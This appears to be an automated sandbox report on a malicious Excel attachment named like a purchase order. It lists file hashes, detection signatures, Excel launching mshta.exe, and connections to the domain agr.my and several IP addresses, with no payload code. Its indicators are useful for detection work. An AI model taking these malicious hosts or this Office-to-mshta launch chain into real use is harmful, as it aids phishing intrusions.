Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
ORDER 517-2025.xla.xlsx

Overview

General Information

Sample name:ORDER 517-2025.xla.xlsx
Analysis ID:1648793
MD5:f9137fe9005de451da58b57301dba5b9
SHA1:5d756a8364f3382703825b71c89247bb2d156f11
SHA256:32df4f4afa4d06c6096d807535d584556cb7dca6234088299106a93a49a8e4ef
Tags:xlaxlsxuser-abuse_ch
Infos:

Detection

Score:56
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious Microsoft Office Child Process
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Suricata IDS alerts with low severity for network traffic
Unable to load, office file is protected or invalid
Uses a known web browser user agent for HTTP communication

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 7144 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • mshta.exe (PID: 1384 cmdline: C:\Windows\SysWOW64\mshta.exe -Embedding MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • splwow64.exe (PID: 1864 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • EXCEL.EXE (PID: 5824 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\ORDER 517-2025.xla.xlsx" MD5: 4A871771235598812032C822E6F68F19)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 7144, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, ProcessId: 1384, ProcessName: mshta.exe
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 147.79.86.93, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7144, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49697
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.7, DestinationIsIpv6: false, DestinationPort: 49697, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7144, Protocol: tcp, SourceIp: 147.79.86.93, SourceIsIpv6: false, SourcePort: 443

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-03-26T08:12:53.394623+010020283713Unknown Traffic192.168.2.74970013.107.246.38443TCP
2025-03-26T08:13:00.433166+010020283713Unknown Traffic192.168.2.74970113.107.246.38443TCP
2025-03-26T08:13:00.433822+010020283713Unknown Traffic192.168.2.74970213.107.246.38443TCP

Joe Sandbox Signatures

  • AV Detection
  • Compliance
  • Software Vulnerabilities
  • Networking
  • System Summary
  • Hooking and other Techniques for Hiding and Protection
  • Malware Analysis System Evasion

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: ORDER 517-2025.xla.xlsxVirustotal: Detection: 28%Perma Link
Source: ORDER 517-2025.xla.xlsxReversingLabs: Detection: 25%
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 147.79.86.93:443 -> 192.168.2.7:49697 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.38:443 -> 192.168.2.7:49700 version: TLS 1.2

Software Vulnerabilities

barindex
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe
Source: global trafficDNS query: name: agr.my
Source: global trafficDNS query: name: agr.my
Source: global trafficDNS query: name: agr.my
Source: global trafficDNS query: name: otelrules.svc.static.microsoft
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 209.46.124.102:80
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 209.46.124.102:80
Source: global trafficTCP traffic: 209.46.124.102:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 209.46.124.102:80
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 209.46.124.102:80
Source: global trafficTCP traffic: 209.46.124.102:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 209.46.124.102:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 209.46.124.102:80
Source: global trafficTCP traffic: 209.46.124.102:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 209.46.124.102:80
Source: global trafficTCP traffic: 209.46.124.102:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 209.46.124.102:80
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
